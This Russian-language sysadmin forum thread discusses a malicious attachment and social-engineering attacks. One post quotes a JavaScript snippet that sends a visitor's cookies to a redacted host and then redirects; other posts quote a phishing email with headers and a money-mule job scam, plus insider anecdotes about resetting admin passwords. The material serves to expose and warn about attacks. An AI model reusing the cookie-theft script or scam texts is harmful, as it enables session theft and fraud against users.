злой админ - Вопросы читателей - Форум samag.ru/forum
www.samag.ru
     
Поиск   
              
 www.samag.ru    Web  0 товаров , сумма 0 руб.
E-mail
Пароль  
 Запомнить меня
Регистрация | Забыли пароль?
Журнал "Системный администратор"
Журнал «БИТ»
Наука и технологии
Подписка
Где купить
Авторам
Рекламодателям
Магазин
Архив номеров
Вакансии
Контакты
   

  Опросы

Какие курсы вы бы выбрали для себя?  

Очные
Онлайновые
Платные
Бесплатные
Я и так все знаю

 Читать далее...

1001 и 1 книга  
20.12.2019г.
Просмотров: 5819
Комментарии: 0
Dr.Web: всё под контролем

 Читать далее...

04.12.2019г.
Просмотров: 7003
Комментарии: 1
Особенности сертификаций по этичному хакингу

 Читать далее...

28.05.2019г.
Просмотров: 8252
Комментарии: 2
Анализ вредоносных программ

 Читать далее...

28.05.2019г.
Просмотров: 8510
Комментарии: 2
Микросервисы и контейнеры Docker

 Читать далее...

28.05.2019г.
Просмотров: 7485
Комментарии: 0
Django 2 в примерах

 Читать далее...

Друзья сайта  

Форум системных администраторов  

sysadmins.ru

 злой админ

Форум / Редакция / Вопросы читателей / злой админ

cfif - 24.10.09 - 23:06
Группа: Пользователи
Статус: Новичок
Сообщений: 1
Зарегистрирован: 24.10.09

ну спасибо тебе админ за это

grinder - 24.10.09 - 23:49
Группа: Авторы
Статус: Почетный житель
Сообщений: 341
Зарегистрирован: 29.08.02

В атаче такой код
<script>
img = new Image(); img.src = "ХХХХ УБРАНО ХХХХ"+document.cookie; // здесь ваш код для кражи кукис
// редирект через 3 сек.
    var URL = "ХХХХ УБРАНО ХХХХ" // адрес открытки, если хотите, можете заменить на свой
    var speed = 3000; // редирект через 3 секунды
    function reload() {
    document.location = URL
    }
    setTimeout("reload()", speed);
</script>

mrak018 - 25.10.09 - 09:40
Группа: Пользователи
Статус: Старожил
Сообщений: 193
Зарегистрирован: 23.12.07

Ха, системные администраторы незнакомые аттачи не открывают

Спасибо Гриндеру, что рискнул.

grinder - 25.10.09 - 10:15
Группа: Авторы
Статус: Почетный житель
Сообщений: 341
Зарегистрирован: 29.08.02

Не сильно и рисковал. После моего ответа он заменил файл.

mrak018 - 25.10.09 - 10:51
Группа: Пользователи
Статус: Старожил
Сообщений: 193
Зарегистрирован: 23.12.07

Забавно было бы написать статью с реальными примерами социальной инженерии, кстати. Поспрашивать сисадминов о случаях. А то в книжках приводится классика типа "позвонил и представился помощником директора", а реальные подставы не описываются.

Мне, например, как-то на postmaster@известныйсайт.ru приходили письма "Техподдержка такая-то, ваш сайт у нас криво открывается, протестируйте вот этой утилиткой". Или "Зайдите сюда, установите апплет, он сам всё проверит". А ещё какой-то тип флешку подарил якобы с презентацией новой софтины для веб-администраторов. Больше ничего не было (или прозевал атаку :-)))

axel - 25.10.09 - 12:37
Группа: Пользователи
Статус: Почетный житель
Сообщений: 997
Зарегистрирован: 20.03.08

да любой из интернет-пользователей встречается с таким социнжинирингом каждый день.
мне например в аську приходит по несколько сообщений в день "ваш номер не активирован, отправьте смс..."

лет 8 назад приходило письмо типа от провайдера (хорошо кстати подделано было), мол, "у нас слетела база данных с аккаунтами, для восстановления пришлите свой логин и пароль". отправил это письмо саппорту, они поблагодарили.

а на работе нашу сеть никто ломать и не пытается...

Что я могу еще сказать?
mrak018 - 25.10.09 - 23:52
Группа: Пользователи
Статус: Старожил
Сообщений: 193
Зарегистрирован: 23.12.07

axel

да любой из интернет-пользователей встречается с таким социнжинирингом каждый день.
мне например в аську приходит по несколько сообщений в день "ваш номер не активирован, отправьте смс..."


Это ж не адресно. Интереснее, когда целенаправленно именно твою сеть атакуют, а не всех сразу.

axel


лет 8 назад приходило письмо типа от провайдера (хорошо кстати подделано было), мол, "у нас слетела база данных с аккаунтами, для восстановления пришлите свой логин и пароль". отправил это письмо саппорту, они поблагодарили.


Вот это интереснее

axel - 26.10.09 - 09:07
Группа: Пользователи
Статус: Почетный житель
Сообщений: 997
Зарегистрирован: 20.03.08

были еще на работе случаи, даже не знаю как назвать: инсайда, превышения полномочий, или просто излишней инициативы.
в общем, на рабочих местах у нас права пользователей урезаны до штатных пользовательских, используемое ПО строго регламентировано.
появился новый сотрудник (причем внештатный), который не привык к нашим бюрократическим порядкам, и решил установить ПО, "к которому привык".
сначала заявился к нам, мол, "дайте мне права локального админа". был послан (читать регламент).
потом он решил действовать без спроса - загрузился с CD и сбросил пароль админа. понаставил своих программ. еще чего-то натворил...
когда мы это обнаружили... до служебного расследования дело доводить не стали, забрали комп на три дня "на профилактику", пришлось ставить пароль на биос (никогда такого не делали - никто так не дурил).
в общем, решили вопрос силовыми методами, а надо было по-правильному...

потом появился продвинутый студент, которому тоже захотелось навести свои порядки.
один из наших админов раньше устанавливал системы на fat32, оставляя на диске dos (чем-то это мотивируя), и никак не хотел переходить на ntfs.
ну вот, студент, загружаясь в дос, засовывал в системные каталоги свои файлы, и имел доступ к системе как хотел...

мораль: не пренебрегайте безопасностью, если не хотите головных болей. даже если у вас нет таких продвинутых сотрудников, когда-нибудь появится новый, или посторонний.

Что я могу еще сказать?
grinder - 26.10.09 - 12:34
Группа: Авторы
Статус: Почетный житель
Сообщений: 341
Зарегистрирован: 29.08.02

Так и сейчас приходят письма о том, что аккаунт блокирован или что-то подобное.
Я у себя на сайте некоторые выкладываю
например

Уважаемый пользователь! Спешим сообщить Вам, что сегодня на сервере произошел небольшой сбой с базой данных. Все уже налажено и стабильная работа сервера возобновлена, но в целях безопасности просим Вас как можно скорее проверить, все ли Ваши проекты присутствуют: http://www.manilink.ru/index.html В случае исчезновения проекта из списка, пожалуйста, незамедлительно сообщите об этом в службу поддержки, все будет восстановлено в кротчайшие сроки без каких-либо потерь.
Приносим свои извинения за неудобства, надеемся на Ваше понимание.

С уважением, MainLink.RU

Return-path: <apache@ueuo-freewebhostingarea-com.ueuo.com>
Received: from [216.245.218.242] (port=38960 helo=ueuo-freewebhostingarea-com.ueuo.com)
by mx17.mail.ru with esmtp
id 1MAWEu-0008hu-00
for besttech@inbox.ru; Sun, 31 May 2009 01:37:16 +0400
Received-SPF: none (mx17.mail.ru: 216.245.218.242 is neither permitted nor denied by domain of ueuo-freewebhostingarea-com.ueuo.com)
client-ip=216.245.218.242; envelope-from=apache@ueuo-freewebhostingarea-com.ueuo.com; helo=ueuo-freewebhostingarea-com.ueuo.com;
X-Mru-PTR: ueuo-freewebhostingarea-com.ueuo.com
X-Mru-NR: 1
X-Mru-OF: Linux (ethernet/modem)
X-Mru-RC: US
Received: from apache by ueuo-freewebhostingarea-com.ueuo.com with local (Exim 4.69)
(envelope-from <apache@ueuo-freewebhostingarea-com.ueuo.com>)
id 1MAWEs-0001d5-LG
for besttech@inbox.ru; Sat, 30 May 2009 16:37:14 -0500
To: besttech@inbox.ru
Subject: Внимание! Сбой на сервере!
From: admin@mainlink.ru
X-Priority: 1 (Highest)
Message-Id: <E1MAWEs-0001d5-LG@ueuo-freewebhostingarea-com.ueuo.com>
Sender: Apache <apache@ueuo-freewebhostingarea-com.ueuo.com>
Date: Sat, 30 May 2009 16:37:14 -0500
X-Spam: Not detected
X-Mras: Ok

Обратите внимание на заголовки – это письма рассылались не c хоста MainLink.RU, в письме орфографические ошибки и самое главное – несоответствие домена: http://www.manilink.ru, здесь легко найти ошибку (но при беглом просмотре письма можно и пропустить это).

grinder - 26.10.09 - 18:08
Группа: Авторы
Статус: Почетный житель
Сообщений: 341
Зарегистрирован: 29.08.02

Это из сегодняшней почты
====
Здравствуйте!

Компания "ХХХХХХХ", Москва, Россия готова Вам предложить должность оператора электронных платежей. Мы занимаемся веб-дизайном, интернет-технологиями, электронной коммерцией. Работа происходит через платёжную системы WebMoney (http://www.webmoney.ru).
Вот чем Вам непосредственно придется заниматься. Мы создаем Вам новый счет (кошелек), получаем для него Персональный аттестат. Владельцем счета является наша компания. Аттестат (Персональный) будет оформляться на Ваш е-mail. Это сделано для того, чтобы Вы сохранили Персональный аттестат для себя. Т.е., если Вы решите уволиться - аттестат закрепляется за Вами.

Персональный аттестат обеспечивает полный объем прав и доступ ко всем без исключения сервисам. А именно:

1. Вводить и выводить WM-средства через банк, используя службу Банкинга;
2. Получать пластиковые карты для быстрого вывода WebMoney через банкоматы;
3. Участвовать в кредитных операциях с использованием WebMoney;
4. Создавать венчуры на онлайновой бирже INDX и быть управляющими этих венчуров;
5. Открывать обменные пункты WebMoney;
6. Участвовать в каталоге Мегасток в любых категориях;
7. Использовать сервис Мерчант для автоматического приема оплат на своих сайтах;
8. Иметь определенные преимущества используя площадку Plati.Ru и технологию DigiSeller в качестве продавцов;
9. Публиковать новости своего интернет-ресурса на главной странице сайта webmoney.ru;
10.Создавать бюджетные автоматы в сервисе Capitaller.

Суть работы заключается в следующем. На Ваш рабочий счёт ежедневно будут поступать денежные средства и указания, в которых будет указано сколько и на какие счета  нужно перевести деньги (WMZ или WMR). Все переводы, а их будет порядка 50 в день, нужно осуществить в течение суток. В среднем у Вас будет уходить 2-4 минуты на один перевод. В будущем с опытом у Вас будет уходить меньше времени на обработку платежей. Это работа на дому, так как предполагает частичную занятость (3-4 часа в день). Сразу предупреждаем: Работа не связана с сетевым маркетингом или иными пирамидально-реферальными проектами и поиском клиентов в просторах Интернета. Нам выгодно нанимать сотрудников на дому, т.к. не требуется дополнительных рабочих мест в офисе. Также Вы работу можете совмещать с основной работой - если у Вас есть свободное время. Оплата интернета за счет работника.

Для работы Вам нужно будет скачать программу WM Keeper Classic 3.7.0.2 (http://www.webmoney.ru/download.shtml). Если Вы сами не сможете разобраться в программе, тогда мы Вам пришлём информацию и ответим на вопросы по установке. Пришлем пошаговые инструкции, как начать работу.

Расценки за работу таковы: с выходными (2 дня в неделю) - $500, без выходных - $600. Зарплата выплачивается 2 раза в месяц. Оплачиваемый больничный - 2 недели в год. З/п фиксированная. Количество переводов фиксирует наш терминал транзакций. Деньги (зарплату) мы переводим на Ваш личный кошелек WebMoney, после чего Вы вправе ими распоряжаться на своё усмотрение. Вы можете обналичить их через любое отделение Сбербанка, через обменник, либо оставить в электронном виде. Также возможен вариант начисления заработанных денег на Ваш расчетный счет в банке или пластиковую карту. При этом комиссия банка составляет 5%.

Наши рабочие счета (кошельки) должны обязательно иметь аттестат (Персональный). Получение Персонального аттестата - услуга платная и самая низкая цена ее 15$ (15 WMZ) или 525р (525 WMR). Таким образом, нам нужна гарантия того, что не получится так, что мы откроем счет, получим аттестат, затратив на это деньги, а Вы исчезните на следующий день. Такой гарантией выступает 15 WMZ (525 WMR), которые Вы оплачиваете нам за Аттестацию. Сумму аттестации мы в свою очередь оплачиваем компании Webmoney. Аттестация в таком случае занимает 2-3 дня, после чего Вы сразу приступаете к работе по мере Вашей готовности. В итоге: у Вас будет 2 кошелька: 1-й - для зарплаты, 2-й - рабочий (c Персональным аттестатом, который Вы оплачиваете и получите после оплаты аттестации). Таким образом, наш риск уменьшается. Пока Вы работаете у нас - аттестат оформлен будет на  нашу организацию. Сразу уточняем: Аттестат будет оформлен на нашу организацию. В самом аттестате будет вписан Ваш электронный адрес.

В случае, если Вы готовы взяться за работы, дайте свой ответ, и в течение 3-х дней нужно будет перевести указанную сумму на наш Z-кошелёк или R-кошелёк. После оплаты за аттестат мы приступаем к аттестации кошелька, получаем для него Персональный аттестат. Это займет 2-3 дня. После чего мы присылаем Вам файл-ключ, идентификатор и пароль для доступа. Код активации придет на Ваш электронный адрес, на который оформляется аттестат. Если Вы будете готовы, то сразу сможете приступить к работе. И с этого дня Вы будете работать на нас и соответственно будет начисляться зарплата. Если есть вопросы, пишите. Пришлем пошаговые инструкции для начала работы.

Если Вас заинтересовало данное предложение и Вы желаете стать нашим сотрудником, то сообщите об этом на е-mail: ХХХХХХ@gmail.com, мы укажем Вам номера электронных кошельков, на которые вы перечислите сумму эквивалентную 15 WMZ для получения Персонального аттестата.
=====

grinder - 26.10.09 - 23:36
Группа: Авторы
Статус: Почетный житель
Сообщений: 341
Зарегистрирован: 29.08.02

Вот нашел скрин каст, правда на украинском http://tutamc.com/node/220

axel - 27.10.09 - 09:29
Группа: Пользователи
Статус: Почетный житель
Сообщений: 997
Зарегистрирован: 20.03.08

достаточно частенько приходилось встречаться:

в организации был модемный интернет, и вот появился другой - адсл или спутниковый.
модем оставлен "в качестве резерва".
обслуживает организацию некий "мальчик по вызову".
после анализа сети выясняется, что модем настроен на входящие соединения с доступом к локальной сети.
т.е. "мальчик" просто вечерами дозванивается на этот модем и сидит в интернете за счет организации.

Что я могу еще сказать?
alekseybb - 27.10.09 - 10:27
Группа: Пользователи
Статус: Почетный житель
Сообщений: 1057
Зарегистрирован: 17.08.04

axel

т.е. "мальчик" просто вечерами дозванивается на этот модем и сидит в интернете за счет организации.


Приглядитесь к этому "мальчку". Его ждет успех, если он даже в таком пустяке проявляет изобретательность и упорство, граничашее с самоистязанием...

Или это просто верх стяжательства, своего рода "супержадность" : звонить через аналоговый ! телефон, чтобы вытянуть порнуху с Сети ;))) Надеюсь, он не пытался еще так обновлять дебиан ;)))

2axel: А Вы не наговариваете на "мальчика"? В принципе иметь dialin для сети на аутсорсе в отсутствие или при ненадежном сетевом подключении вполне нормально.

grinder - 27.10.09 - 10:50
Группа: Авторы
Статус: Почетный житель
Сообщений: 341
Зарегистрирован: 29.08.02

Приглядитесь к этому "мальчку". Его ждет успех, если он даже в таком пустяке проявляет изобретательность и упорство, граничашее с самоистязанием...

Мальчик показал свою проф пригодность.

axel - 27.10.09 - 15:40
Группа: Пользователи
Статус: Почетный житель
Сообщений: 997
Зарегистрирован: 20.03.08

alekseybb

axel

т.е. "мальчик" просто вечерами дозванивается на этот модем и сидит в интернете за счет организации.


Приглядитесь к этому "мальчку". Его ждет успех, если он даже в таком пустяке проявляет изобретательность и упорство, граничашее с самоистязанием...

Или это просто верх стяжательства, своего рода "супержадность" : звонить через аналоговый ! телефон, чтобы вытянуть порнуху с Сети ;))) Надеюсь, он не пытался еще так обновлять дебиан ;)))


просто в нашем городе до недавнего времени было практически без альтернативы - интернет только через диалап или gprs, так что на самоистязания это не похоже, а на воровство - да.

Что я могу еще сказать?

«  1     »

               Copyright © Системный администратор

Яндекс.Метрика
_
Tel.: (499) 277-12-41
Fax: (499) 277-12-45
E-mail: sa@samag.ru